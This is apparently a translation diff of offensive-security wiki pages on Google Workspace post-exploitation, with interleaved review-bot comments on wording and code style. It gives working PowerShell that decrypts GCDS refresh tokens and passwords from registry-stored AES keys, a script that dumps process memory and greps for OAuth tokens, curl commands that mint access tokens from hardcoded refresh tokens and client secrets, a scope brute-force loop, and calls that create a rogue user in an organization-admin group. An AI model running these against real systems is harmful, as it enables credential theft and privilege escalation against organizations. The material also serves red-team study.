Ako imate **sesiju unutar google naloga žrtve**, možete preuzeti sve što Google čuva o tom nalogu sa [**https://takeout.google.com**](https://takeout.google.com/u/1/?pageId=none)
## Vault - Download all the Workspace data of users
## Vault - Preuzmi sve podatke Workspace-a korisnika
If an organization has **Google Vault enabled**, you might be able to access [**https://vault.google.com**](https://vault.google.com/u/1/) and **download** all the **information**.
Ako organizacija ima **Google Vault omogućen**, možda ćete moći da pristupite [**https://vault.google.com**](https://vault.google.com/u/1/) i **preuzmete** sve **informacije**.
## Contacts download
## Preuzimanje kontakata
From [**https://contacts.google.com**](https://contacts.google.com/u/1/?hl=es&tab=mC) you can download all the **contacts** of the user.
Sa [**https://contacts.google.com**](https://contacts.google.com/u/1/?hl=es&tab=mC) možete preuzeti sve **kontakte** korisnika.
## Cloudsearch
In [**https://cloudsearch.google.com/**](https://cloudsearch.google.com) you can just search **through all the Workspace content** (email, drive, sites...) a user has access to. Ideal to **quickly find sensitive information**.
Na [**https://cloudsearch.google.com/**](https://cloudsearch.google.com) možete jednostavno pretraživati **sadržaj Workspace-a** (email, drive, sajtove...) kojem korisnik ima pristup. Idealno za **brzo pronalaženje osetljivih informacija**.
## Google Chat
In [**https://mail.google.com/chat**](https://mail.google.com/chat) you can access a Google **Chat**, and you might find sensitive information in the conversations (if any).
Na [**https://mail.google.com/chat**](https://mail.google.com/chat) možete pristupiti Google **Chat-u**, i možda ćete pronaći osetljive informacije u razgovorima (ako ih ima).
## Google Drive Mining
When **sharing** a document you can **specify** the **people** that can access it one by one, **share** it with your **entire company** (**or** with some specific **groups**) by **generating a link**.
Kada **delite** dokument, možete **navesti** **ljude** koji mogu da mu pristupe jedan po jedan, **podeliti** ga sa vašom **celom kompanijom** (**ili** sa nekim specifičnim **grupama**) generisanjem linka.
When sharing a document, in the advance setting you can also **allow people to search** for this file (by **default** this is **disabled**). However, it's important to note that once users views a document, it's searchable by them.
Kada delite dokument, u naprednim podešavanjima takođe možete **dozvoliti ljudima da pretražuju** ovaj fajl (po **defaultu** je **onemogućeno**). Međutim, važno je napomenuti da kada korisnici pogledaju dokument, on postaje pretražljiv za njih.
For sake of simplicity, most of the people will generate and share a link instead of adding the people that can access the document one by one.
Radi jednostavnosti, većina ljudi će generisati i deliti link umesto da dodaju ljude koji mogu da pristupe dokumentu jedan po jedan.
Some proposed ways to find all the documents:
Neki predloženi načini za pronalaženje svih dokumenata:
- Search in internal chat, forums...
- **Spider** known **documents** searching for **references** to other documents. You can do this within an App Script with[ **PaperChaser**](https://github.com/mandatoryprogrammer/PaperChaser)
- Pretražujte u internom chatu, forumima...
- **Spider** poznate **dokumente** tražeći **reference** na druge dokumente. To možete uraditi unutar App Script-a sa [**PaperChaser**](https://github.com/mandatoryprogrammer/PaperChaser)
## **Keep Notes**
In [**https://keep.google.com/**](https://keep.google.com) you can access the notes of the user, **sensitive** **information** might be saved in here.
Na [**https://keep.google.com/**](https://keep.google.com) možete pristupiti beleškama korisnika, **osetljive** **informacije** mogu biti sačuvane ovde.
### Modify App Scripts
In [**https://script.google.com/**](https://script.google.com/) you can find the APP Scripts of the user.
Na [**https://script.google.com/**](https://script.google.com/) možete pronaći APP Scripts korisnika.
## **Administrate Workspace**
In [**https://admin.google.com**/](https://admin.google.com), you might be able to modify the Workspace settings of the whole organization if you have enough permissions.
Na [**https://admin.google.com**/](https://admin.google.com), možda ćete moći da modifikujete podešavanja Workspace-a cele organizacije ako imate dovoljno dozvola.
You can also find emails by searching through all the user's invoices in [**https://admin.google.com/ac/emaillogsearch**](https://admin.google.com/ac/emaillogsearch)
Takođe možete pronaći mejlove pretražujući sve korisnikove fakture na [**https://admin.google.com/ac/emaillogsearch**](https://admin.google.com/ac/emaillogsearch)
## References
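Review bot: the source line `searching through all the user's invoices` looks like a typo in the English text (the linked page is the Admin console email log search, `/ac/emaillogsearch`, not billing), and the translation reproduces it literally as `fakture`, which makes the Serbian sentence nonsensical; fix the English wording first (`email logs`) and retranslate. In the Keep Notes line, `osetljive informacije mogu biti sačuvane ovde` is fine, but `APP Scripts` two lines later should match the `App Script` spelling used in the Drive Mining bullet.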
@@ -72,7 +72,3 @@ You can also find emails by searching through all the user's invoices in [**http
- [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite?
{{#include ../../banners/hacktricks-training.md}}
@@ -4,12 +4,12 @@
## GCPW - Google Credential Provider for Windows
This is the single sign-on that Google Workspaces provides so users can login in their Windows PCs using **their Workspace credentials**. Moreover, this will store **tokens** to access Google Workspace in some places in the PC: Disk, memory & the registry... it's even possible to obtain the **clear text password**.
Ovo je jedinstveno prijavljivanje koje Google Workspace pruža kako bi korisnici mogli da se prijave na svojim Windows PC-ima koristeći **svoje Workspace akreditive**. Štaviše, ovo će čuvati **tokene** za pristup Google Workspace na nekim mestima na PC-u: Disk, memorija i registri... čak je moguće dobiti **lozinku u čistom tekstu**.
> [!TIP]
> Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GCPW**, get information about the configuration and **even tokens**.
> Imajte na umu da [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) može da detektuje **GCPW**, dobije informacije o konfiguraciji i **čak tokene**.
Find more information about this in:
Pronađite više informacija o ovome u:
{{#ref}}
gcpw-google-credential-provider-for-windows.md
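Review bot: `Disk, memorija i registri` renders the singular `the registry` as a plural; use `registar` (or keep `registry`), which is the term the same commit uses later for the `HKCU\...` paths in the GCDS file.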
@@ -17,14 +17,14 @@ gcpw-google-credential-provider-for-windows.md
## GCSD - Google Cloud Directory Sync
This is a tool that can be used to **sync your active directory users and groups to your Workspace** (and not the other way around by the time of this writing).
Ovo je alat koji se može koristiti za **sinhronizaciju vaših korisnika i grupa aktivnog direktorijuma sa vašim Workspace-om** (a ne obrnuto u vreme pisanja ovog teksta).
It's interesting because it's a tool that will require the **credentials of a Workspace superuser and privileged AD user**. So, it might be possible to find it inside a domain server that would be synchronising users from time to time.
Zanimljivo je jer je to alat koji će zahtevati **akreditive superkorisnika Workspace-a i privilegovanog AD korisnika**. Tako da bi moglo biti moguće pronaći ga unutar domen servera koji bi povremeno sinhronizovao korisnike.
> [!TIP]
> Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GCDS**, get information about the configuration and **even the passwords and encrypted credentials**.
> Imajte na umu da [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) može da detektuje **GCDS**, dobije informacije o konfiguraciji i **čak lozinke i enkriptovane akreditive**.
Find more information about this in:
Pronađite više informacija o ovome u:
{{#ref}}
gcds-google-cloud-directory-sync.md
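Review bot: the context heading `## GCSD - Google Cloud Directory Sync` uses `GCSD` while the tip below it and the linked file say `GCDS`; the translation cannot fix it because the heading is untouched, so correct it in the English source. Separately, `Active Directory` is a product name and should not be translated as `aktivnog direktorijuma`; the following translated line already keeps `AD` untranslated, so `Active Directory` should stay as-is for consistency.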
@@ -32,14 +32,14 @@ gcds-google-cloud-directory-sync.md
## GPS - Google Password Sync
This is the binary and service that Google offers in order to **keep synchronized the passwords of the users between the AD** and Workspace. Every-time a user changes his password in the AD, it's set to Google.
Ovo je binarni fajl i servis koji Google nudi kako bi **održao sinhronizovane lozinke korisnika između AD-a** i Workspace-a. Svaki put kada korisnik promeni svoju lozinku u AD-u, ona se postavlja na Google.
It gets installed in `C:\Program Files\Google\Password Sync` where you can find the binary `PasswordSync.exe` to configure it and `password_sync_service.exe` (the service that will continue running).
Instalira se u `C:\Program Files\Google\Password Sync` gde možete pronaći binarni fajl `PasswordSync.exe` za konfiguraciju i `password_sync_service.exe` (servis koji će nastaviti da radi).
> [!TIP]
> Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GPS**, get information about the configuration and **even the passwords and encrypted credentials**.
> Imajte na umu da [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) može da detektuje **GPS**, dobije informacije o konfiguraciji i **čak lozinke i enkriptovane akreditive**.
Find more information about this in:
Pronađite više informacija o ovome u:
{{#ref}}
gps-google-password-sync.md
@@ -47,16 +47,12 @@ gps-google-password-sync.md
## Admin Directory Sync
The main difference between this way to synchronize users with GCDS is that GCDS is done manually with some binaries you need to download and run while **Admin Directory Sync is serverless** managed by Google in [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories).
Glavna razlika između ovog načina sinhronizacije korisnika sa GCDS je ta što se GCDS radi ručno sa nekim binarnim fajlovima koje treba preuzeti i pokrenuti dok je **Admin Directory Sync bezserverski** i upravlja ga Google na [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories).
Find more information about this in:
Pronađite više informacija o ovome u:
{{#ref}}
gws-admin-directory-sync.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}
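Review bot: `upravlja ga Google` is ungrammatical (upravljati takes the instrumental); `kojim upravlja Google` is the intended sense. `bezserverski` is acceptable, but the page elsewhere keeps English product terms, so `serverless` in parentheses would help readers who search for the feature.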
@@ -2,30 +2,29 @@
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
## Osnovne informacije
This is a tool that can be used to **sync your active directory users and groups to your Workspace** (and not the other way around by the time of this writing).
Ovo je alat koji se može koristiti za **sinhronizaciju vaših korisnika i grupa aktivnog direktorijuma sa vašim Workspace** (a ne obrnuto u vreme pisanja ovog teksta).
It's interesting because it's a tool that will require the **credentials of a Workspace superuser and privileged AD user**. So, it might be possible to find it inside a domain server that would be synchronising users from time to time.
Zanimljivo je jer je to alat koji će zahtevati **akreditive superkorisnika Workspace-a i privilegovanog AD korisnika**. Tako da bi moglo biti moguće pronaći ga unutar domen servera koji bi povremeno sinhronizovao korisnike.
> [!NOTE]
> To perform a **MitM** to the **`config-manager.exe`** binary just add the following line in the `config.manager.vmoptions` file: **`-Dcom.sun.net.ssl.checkRevocation=false`**
> Da biste izvršili **MitM** na **`config-manager.exe`** binarnu datoteku, jednostavno dodajte sledeću liniju u `config.manager.vmoptions` datoteku: **`-Dcom.sun.net.ssl.checkRevocation=false`**
> [!TIP]
> Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GCDS**, get information about the configuration and **even the passwords and encrypted credentials**.
> Imajte na umu da [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) može da detektuje **GCDS**, dobije informacije o konfiguraciji i **čak i lozinke i enkriptovane akreditive**.
Also note that GCDS won't synchronize passwords from AD to Workspace. If something it'll just generate random passwords for newly created users in Workspace as you can see in the following image:
Takođe imajte na umu da GCDS neće sinhronizovati lozinke iz AD u Workspace. Ako nešto, samo će generisati nasumične lozinke za novokreirane korisnike u Workspace-u, kao što možete videti na sledećoj slici:
<figure><img src="../../../images/telegram-cloud-photo-size-4-5780773316536156543-x.jpg" alt="" width="515"><figcaption></figcaption></figure>
### GCDS - Disk Tokens & AD Credentials
### GCDS - Disk tokeni i AD akreditive
The binary `config-manager.exe` (the main GCDS binary with GUI) will store the configured Active Directory credentials, the refresh token and the access by default in a **xml file** in the folder **`C:\Program Files\Google Cloud Directory Sync`** in a file called **`Untitled-1.xml`** by default. Although it could also be saved in the `Documents` of the user or in **any other folder**.
Binarna datoteka `config-manager.exe` (glavna GCDS binarna datoteka sa GUI) će po defaultu čuvati konfigurirane akreditive aktivnog direktorijuma, osvežavajući token i pristup u **xml datoteci** u folderu **`C:\Program Files\Google Cloud Directory Sync`** u datoteci pod nazivom **`Untitled-1.xml`**. Iako bi takođe mogla biti sačuvana u `Dokumentima` korisnika ili u **bilo kojem drugom folderu**.
Moreover, the registry **`HKCU\SOFTWARE\JavaSoft\Prefs\com\google\usersyncapp\ui`** inside the key **`open.recent`** contains the paths to all the recently opened configuration files (xmls). So it's possible to **check it to find them**.
The most interesting information inside the file would be:
Štaviše, registar **`HKCU\SOFTWARE\JavaSoft\Prefs\com\google\usersyncapp\ui`** unutar ključa **`open.recent`** sadrži putanje do svih nedavno otvorenih konfiguracionih datoteka (xml). Tako da je moguće **proveriti to da ih pronađete**.
Najzanimljivije informacije unutar datoteke bi bile:
```xml
[...]
<loginMethod>OAUTH2</loginMethod>
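Review bot: terminology drifts inside this hunk: `refresh token` is rendered `osvežavajući token` in the heading's paragraph but kept as `refresh token` in the Note after the XML and in the memory-dump section later in the file; pick one rendering. `Ako nešto` is a word-for-word calque of `If something` and reads as nonsense in Serbian (`Umesto toga` / `U najboljem slučaju` carry the meaning). Two source problems also leak through: the English `the refresh token and the access` is missing the word `token`, so the translation's `i pristup` inherits the gap, and `sa vašim Workspace` lacks the case ending the same sentence uses earlier in the commit (`Workspace-om`).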
@@ -50,13 +49,11 @@ The most interesting information inside the file would be:
<authCredentialsEncrypted>XMmsPMGxz7nkpChpC7h2ag==</authCredentialsEncrypted>
[...]
```
Note how the **refresh** **token** and the **password** of the user are **encrypted** using **AES CBC** with a randomly generated key and IV stored in **`HKEY_CURRENT_USER\SOFTWARE\JavaSoft\Prefs\com\google\usersyncapp\util`** (wherever the **`prefs`** Java library store the preferences) in the string keys **`/Encryption/Policy/V2.iv`** and **`/Encryption/Policy/V2.key`** stored in base64.
Napomena kako su **refresh** **token** i **password** korisnika **šifrovani** koristeći **AES CBC** sa nasumično generisanim ključem i IV koji su sačuvani u **`HKEY_CURRENT_USER\SOFTWARE\JavaSoft\Prefs\com\google\usersyncapp\util`** (gde god **`prefs`** Java biblioteka čuva podešavanja) u string ključevima **`/Encryption/Policy/V2.iv`** i **`/Encryption/Policy/V2.key`** sačuvanim u base64.
<details>
<summary>Powershell script to decrypt the refresh token and the password</summary>
<summary>Powershell skripta za dešifrovanje refresh tokena i lozinke</summary>
```powershell
# Paths and key names
$xmlConfigPath = "C:\Users\c\Documents\conf.xml"
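Review bot: `Napomena kako su ...` turns the imperative `Note how ...` into a noun phrase; `Primetite da su ...` is what the source means. The same line leaves `password` untranslated while the rest of the commit uses `lozinka`. The script that follows hardcodes a personal path (`C:\Users\c\Documents\conf.xml`) that every reader must edit; a comment saying so, or a parameter, would make that explicit.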
@@ -66,34 +63,34 @@ $keyKeyName = "/Encryption/Policy/V2.key"
# Open the registry key
try {
$regKey = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey($regPath)
if (-not $regKey) {
Throw "Registry key not found: HKCU\$regPath"
}
$regKey = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey($regPath)
if (-not $regKey) {
Throw "Registry key not found: HKCU\$regPath"
}
}
catch {
Write-Error "Failed to open registry key: $_"
exit
Write-Error "Failed to open registry key: $_"
exit
}
# Get Base64-encoded IV and Key from the registry
try {
$ivBase64 = $regKey.GetValue($ivKeyName)
$ivBase64 = $ivBase64 -replace '/', ''
$ivBase64 = $ivBase64 -replace '\\', '/'
if (-not $ivBase64) {
Throw "IV not found in registry"
}
$keyBase64 = $regKey.GetValue($keyKeyName)
$keyBase64 = $keyBase64 -replace '/', ''
$keyBase64 = $keyBase64 -replace '\\', '/'
if (-not $keyBase64) {
Throw "Key not found in registry"
}
$ivBase64 = $regKey.GetValue($ivKeyName)
$ivBase64 = $ivBase64 -replace '/', ''
$ivBase64 = $ivBase64 -replace '\\', '/'
if (-not $ivBase64) {
Throw "IV not found in registry"
}
$keyBase64 = $regKey.GetValue($keyKeyName)
$keyBase64 = $keyBase64 -replace '/', ''
$keyBase64 = $keyBase64 -replace '\\', '/'
if (-not $keyBase64) {
Throw "Key not found in registry"
}
}
catch {
Write-Error "Failed to read registry values: $_"
exit
Write-Error "Failed to read registry values: $_"
exit
}
$regKey.Close()
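Review bot: this hunk is whitespace-only (every removed line reappears unchanged apart from indentation); a translation commit should leave code blocks alone, since these re-indentations add dozens of lines of diff noise per block and make the translated prose harder to review. If the code is touched anyway, the two `-replace` steps (`-replace '/', ''` followed by `-replace '\\', '/'`) deserve a comment: they undo the escaping Java's Preferences API applies to values it stores in the registry (capital letters are prefixed with `/`, a literal `/` is stored as `\`), which is also why the order of the two replacements matters.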
@@ -118,25 +115,25 @@ $encryptedPasswordBytes = [Convert]::FromBase64String($encryptedPasswordBase64)
# Function to decrypt data using AES CBC
Function Decrypt-Data($cipherBytes, $keyBytes, $ivBytes) {
$aes = [System.Security.Cryptography.Aes]::Create()
$aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
$aes.KeySize = 256
$aes.BlockSize = 128
$aes.Key = $keyBytes
$aes.IV = $ivBytes
$aes = [System.Security.Cryptography.Aes]::Create()
$aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
$aes.KeySize = 256
$aes.BlockSize = 128
$aes.Key = $keyBytes
$aes.IV = $ivBytes
$decryptor = $aes.CreateDecryptor()
$memoryStream = New-Object System.IO.MemoryStream
$cryptoStream = New-Object System.Security.Cryptography.CryptoStream($memoryStream, $decryptor, [System.Security.Cryptography.CryptoStreamMode]::Write)
$cryptoStream.Write($cipherBytes, 0, $cipherBytes.Length)
$cryptoStream.FlushFinalBlock()
$plaintextBytes = $memoryStream.ToArray()
$decryptor = $aes.CreateDecryptor()
$memoryStream = New-Object System.IO.MemoryStream
$cryptoStream = New-Object System.Security.Cryptography.CryptoStream($memoryStream, $decryptor, [System.Security.Cryptography.CryptoStreamMode]::Write)
$cryptoStream.Write($cipherBytes, 0, $cipherBytes.Length)
$cryptoStream.FlushFinalBlock()
$plaintextBytes = $memoryStream.ToArray()
$cryptoStream.Close()
$memoryStream.Close()
$cryptoStream.Close()
$memoryStream.Close()
return $plaintextBytes
return $plaintextBytes
}
# Decrypt the values
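Review bot: whitespace-only hunk again, same remark as above. While here: `Decrypt-Data` creates the `Aes` object and its decryptor but never disposes them (`$aes.Dispose()` after the streams are closed), and `Decrypt` is not an approved PowerShell verb, so the function would trigger a warning if the script were ever imported as a module; `Unprotect-Data` or `ConvertFrom-AesCbc` would be idiomatic.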
@@ -150,23 +147,21 @@ $decryptedPassword = [System.Text.Encoding]::UTF8.GetString($decryptedPasswordBy
Write-Host "Decrypted Refresh Token: $refreshToken"
Write-Host "Decrypted Password: $decryptedPassword"
```
</details>
> [!NOTE]
> Note that it's possible to check this information checking the java code of **`DirSync.jar`** from **`C:\Program Files\Google Cloud Directory Sync`** searching for the string `exportkeys` (as thats the cli param that the binary `upgrade-config.exe` expects to dump the keys).
> Imajte na umu da je moguće proveriti ove informacije pregledanjem java koda **`DirSync.jar`** iz **`C:\Program Files\Google Cloud Directory Sync`** pretražujući string `exportkeys` (jer je to cli parametar koji binarni `upgrade-config.exe` očekuje da izvuče ključeve).
Instead of using the powershell script, it's also possible to use the binary **`:\Program Files\Google Cloud Directory Sync\upgrade-config.exe`** with the param `-exportKeys` and get the **Key** and **IV** from the registry in hex and then just use some cyberchef with AES/CBC and that key and IV to decrypt the info.
Umesto korišćenja powershell skripte, takođe je moguće koristiti binarni **`:\Program Files\Google Cloud Directory Sync\upgrade-config.exe`** sa parametrom `-exportKeys` i dobiti **Key** i **IV** iz registra u heksadecimalnom formatu, a zatim jednostavno koristiti neki cyberchef sa AES/CBC i tim ključem i IV za dešifrovanje informacija.
### GCDS - Dumping tokens from memory
### GCDS - Ispisivanje tokena iz memorije
Just like with GCPW, it's possible to dump the memory of the process of the `config-manager.exe` process (it's the name of the GCDS main binary with GUI) and you will be able to find refresh and access tokens (if they have been generated already).\
I guess you could also find the AD configured credentials.
Baš kao i sa GCPW, moguće je ispisati memoriju procesa `config-manager.exe` (to je naziv glavnog binarnog GCDS-a sa GUI) i moći ćete da pronađete refresh i access tokene (ako su već generisani).\
Pretpostavljam da biste takođe mogli pronaći AD konfigurisane kredencijale.
<details>
<summary>Dump config-manager.exe processes and search tokens</summary>
<summary>Ispisivanje procesa config-manager.exe i pretraga tokena</summary>
```powershell
# Define paths for Procdump and Strings utilities
$procdumpPath = "C:\Users\carlos_hacktricks\Desktop\SysinternalsSuite\procdump.exe"
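Review bot: the path `:\Program Files\Google Cloud Directory Sync\upgrade-config.exe` is missing its drive letter in both the source line and the translation; the Note just above writes it as `C:\Program Files\Google Cloud Directory Sync`. The heading `Ispisivanje tokena iz memorije` means `printing`, not dumping; `Izvlačenje tokena iz memorije` (or keeping `dump`) conveys the sense. The script that follows hardcodes a personal desktop path for `procdump.exe`, which deserves a comment telling readers to change it.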
@@ -175,13 +170,13 @@ $dumpFolder = "C:\Users\Public\dumps"
# Regular expressions for tokens
$tokenRegexes = @(
"ya29\.[a-zA-Z0-9_\.\-]{50,}",
"1//[a-zA-Z0-9_\.\-]{50,}"
"ya29\.[a-zA-Z0-9_\.\-]{50,}",
"1//[a-zA-Z0-9_\.\-]{50,}"
)
# Create a directory for the dumps if it doesn't exist
if (!(Test-Path $dumpFolder)) {
New-Item -Path $dumpFolder -ItemType Directory
New-Item -Path $dumpFolder -ItemType Directory
}
# Get all Chrome process IDs
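Review bot: whitespace-only hunk. The surviving comment `# Get all Chrome process IDs` is stale, left over from a Chrome-oriented version of the script: the variable it introduces is filled by `Get-Process -Name "config-manager"` (visible in the next hunk header), so the comment, and the `chrome_` prefix used for the dump files, should say `config-manager`.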
@@ -189,96 +184,92 @@ $chromeProcesses = Get-Process -Name "config-manager" -ErrorAction SilentlyConti
# Dump each Chrome process
foreach ($processId in $chromeProcesses) {
Write-Output "Dumping process with PID: $processId"
& $procdumpPath -accepteula -ma $processId "$dumpFolder\chrome_$processId.dmp"
Write-Output "Dumping process with PID: $processId"
& $procdumpPath -accepteula -ma $processId "$dumpFolder\chrome_$processId.dmp"
}
# Extract strings and search for tokens in each dump
Get-ChildItem $dumpFolder -Filter "*.dmp" | ForEach-Object {
$dumpFile = $_.FullName
$baseName = $_.BaseName
$asciiStringsFile = "$dumpFolder\${baseName}_ascii_strings.txt"
$unicodeStringsFile = "$dumpFolder\${baseName}_unicode_strings.txt"
$dumpFile = $_.FullName
$baseName = $_.BaseName
$asciiStringsFile = "$dumpFolder\${baseName}_ascii_strings.txt"
$unicodeStringsFile = "$dumpFolder\${baseName}_unicode_strings.txt"
Write-Output "Extracting strings from $dumpFile"
& $stringsPath -accepteula -n 50 -nobanner $dumpFile > $asciiStringsFile
& $stringsPath -accepteula -n 50 -nobanner -u $dumpFile > $unicodeStringsFile
Write-Output "Extracting strings from $dumpFile"
& $stringsPath -accepteula -n 50 -nobanner $dumpFile > $asciiStringsFile
& $stringsPath -accepteula -n 50 -nobanner -u $dumpFile > $unicodeStringsFile
$outputFiles = @($asciiStringsFile, $unicodeStringsFile)
$outputFiles = @($asciiStringsFile, $unicodeStringsFile)
foreach ($file in $outputFiles) {
foreach ($regex in $tokenRegexes) {
foreach ($file in $outputFiles) {
foreach ($regex in $tokenRegexes) {
$matches = Select-String -Path $file -Pattern $regex -AllMatches
$matches = Select-String -Path $file -Pattern $regex -AllMatches
$uniqueMatches = @{}
$uniqueMatches = @{}
foreach ($matchInfo in $matches) {
foreach ($match in $matchInfo.Matches) {
$matchValue = $match.Value
if (-not $uniqueMatches.ContainsKey($matchValue)) {
$uniqueMatches[$matchValue] = @{
LineNumber = $matchInfo.LineNumber
LineText = $matchInfo.Line.Trim()
FilePath = $matchInfo.Path
}
}
}
}
foreach ($matchInfo in $matches) {
foreach ($match in $matchInfo.Matches) {
$matchValue = $match.Value
if (-not $uniqueMatches.ContainsKey($matchValue)) {
$uniqueMatches[$matchValue] = @{
LineNumber = $matchInfo.LineNumber
LineText = $matchInfo.Line.Trim()
FilePath = $matchInfo.Path
}
}
}
}
foreach ($matchValue in $uniqueMatches.Keys) {
$info = $uniqueMatches[$matchValue]
Write-Output "Match found in file '$($info.FilePath)' on line $($info.LineNumber): $($info.LineText)"
}
}
foreach ($matchValue in $uniqueMatches.Keys) {
$info = $uniqueMatches[$matchValue]
Write-Output "Match found in file '$($info.FilePath)' on line $($info.LineNumber): $($info.LineText)"
}
}
Write-Output ""
}
Write-Output ""
}
}
Remove-Item -Path $dumpFolder -Recurse -Force
```
</details>
### GCDS - Generating access tokens from refresh tokens
Using the refresh token it's possible to generate access tokens using it and the client ID and client secret specified in the following command:
### GCDS - Generisanje pristupnih tokena iz osvežavajućih tokena
Korišćenjem osvežavajućeg tokena moguće je generisati pristupne tokene koristeći ga i ID klijenta i tajnu klijenta navedene u sledećoj komandi:
```bash
curl -s --data "client_id=118556098869.apps.googleusercontent.com" \
--data "client_secret=Co-LoSjkPcQXD9EjJzWQcgpy" \
--data "grant_type=refresh_token" \
--data "refresh_token=1//03gQU44mwVnU4CDHYE736TGMSNwF-L9IrTuikNFVZQ3sBxshrJaki7QvpHZQMeANHrF0eIPebz0dz0S987354AuSdX38LySlWflI" \
https://www.googleapis.com/oauth2/v4/token
--data "client_secret=Co-LoSjkPcQXD9EjJzWQcgpy" \
--data "grant_type=refresh_token" \
--data "refresh_token=1//03gQU44mwVnU4CDHYE736TGMSNwF-L9IrTuikNFVZQ3sBxshrJaki7QvpHZQMeANHrF0eIPebz0dz0S987354AuSdX38LySlWflI" \
https://www.googleapis.com/oauth2/v4/token
```
### GCDS - Scopes
> [!NOTE]
> Note that even having a refresh token, it's not possible to request any scope for the access token as you can only requests the **scopes supported by the application where you are generating the access token**.
> Imajte na umu da čak i kada imate refresh token, nije moguće zatražiti bilo koji scope za access token jer možete zatražiti samo **scope-ove koje podržava aplikacija u kojoj generišete access token**.
>
> Also, the refresh token is not valid in every application.
> Takođe, refresh token nije važeći u svakoj aplikaciji.
By default GCSD won't have access as the user to every possible OAuth scope, so using the following script we can find the scopes that can be used with the `refresh_token` to generate an `access_token`:
Podrazumevano, GCSD neće imati pristup kao korisnik svim mogućim OAuth scope-ovima, pa možemo koristiti sledeći skript da pronađemo scope-ove koji se mogu koristiti sa `refresh_token` za generisanje `access_token`:
<details>
<summary>Bash script to brute-force scopes</summary>
```bash
curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do
echo -ne "Testing $scope \r"
if ! curl -s --data "client_id=118556098869.apps.googleusercontent.com" \
--data "client_secret=Co-LoSjkPcQXD9EjJzWQcgpy" \
--data "grant_type=refresh_token" \
--data "refresh_token=1//03PR0VQOSCjS1CgYIARAAGAMSNwF-L9Ir5b_vOaCmnXzla0nL7dX7TJJwFcvrfgDPWI-j19Z4luLpYfLyv7miQyvgyXjGEXt-t0A" \
--data "scope=$scope" \
https://www.googleapis.com/oauth2/v4/token 2>&1 | grep -q "error_description"; then
echo ""
echo $scope
echo $scope >> /tmp/valid_scopes.txt
fi
echo -ne "Testing $scope \r"
if ! curl -s --data "client_id=118556098869.apps.googleusercontent.com" \
--data "client_secret=Co-LoSjkPcQXD9EjJzWQcgpy" \
--data "grant_type=refresh_token" \
--data "refresh_token=1//03PR0VQOSCjS1CgYIARAAGAMSNwF-L9Ir5b_vOaCmnXzla0nL7dX7TJJwFcvrfgDPWI-j19Z4luLpYfLyv7miQyvgyXjGEXt-t0A" \
--data "scope=$scope" \
https://www.googleapis.com/oauth2/v4/token 2>&1 | grep -q "error_description"; then
echo ""
echo $scope
echo $scope >> /tmp/valid_scopes.txt
fi
done
echo ""
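Review bot: in the scope loop a scope is recorded as valid whenever the token endpoint's response does not contain `error_description`, so an empty reply (curl run with `-s` fails silently on a network error) marks every scope as valid and fills `/tmp/valid_scopes.txt` with false positives; testing for the presence of `access_token` in the body is the robust check. In the PowerShell part, `$matches` shadows PowerShell's automatic `$Matches` variable; rename it (`$found`). The rest of the hunk is indentation-only churn in code blocks, and `osvežavajućih tokena` in the heading conflicts with `refresh token` used in the Note a few lines below.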
@@ -287,11 +278,9 @@ echo "Valid scopes:"
cat /tmp/valid_scopes.txt
rm /tmp/valid_scopes.txt
```
</details>
And this is the output I got at the time of the writing:
I ovo je izlaz koji sam dobio u vreme pisanja:
```
https://www.googleapis.com/auth/admin.directory.group
https://www.googleapis.com/auth/admin.directory.orgunit
@@ -302,43 +291,36 @@ https://www.googleapis.com/auth/apps.groups.settings
https://www.googleapis.com/auth/apps.licensing
https://www.googleapis.com/auth/contacts
```
#### Create a user and add it into the group `gcp-organization-admins` to try to escalate in GCP
#### Kreirajte korisnika i dodajte ga u grupu `gcp-organization-admins` da biste pokušali da eskalirate u GCP
```bash
# Create new user
curl -X POST \
'https://admin.googleapis.com/admin/directory/v1/users' \
-H 'Authorization: Bearer <ACCESS_TOKEN>' \
-H 'Content-Type: application/json' \
-d '{
"primaryEmail": "deleteme@domain.com",
"name": {
"givenName": "Delete",
"familyName": "Me"
},
"password": "P4ssw0rdStr0ng!",
"changePasswordAtNextLogin": false
}'
'https://admin.googleapis.com/admin/directory/v1/users' \
-H 'Authorization: Bearer <ACCESS_TOKEN>' \
-H 'Content-Type: application/json' \
-d '{
"primaryEmail": "deleteme@domain.com",
"name": {
"givenName": "Delete",
"familyName": "Me"
},
"password": "P4ssw0rdStr0ng!",
"changePasswordAtNextLogin": false
}'
# Add to group
curl -X POST \
'https://admin.googleapis.com/admin/directory/v1/groups/gcp-organization-admins@domain.com/members' \
-H 'Authorization: Bearer <ACCESS_TOKEN>' \
-H 'Content-Type: application/json' \
-d '{
"email": "deleteme@domain.com",
"role": "OWNER"
}'
'https://admin.googleapis.com/admin/directory/v1/groups/gcp-organization-admins@domain.com/members' \
-H 'Authorization: Bearer <ACCESS_TOKEN>' \
-H 'Content-Type: application/json' \
-d '{
"email": "deleteme@domain.com",
"role": "OWNER"
}'
# You could also change the password of a user for example
```
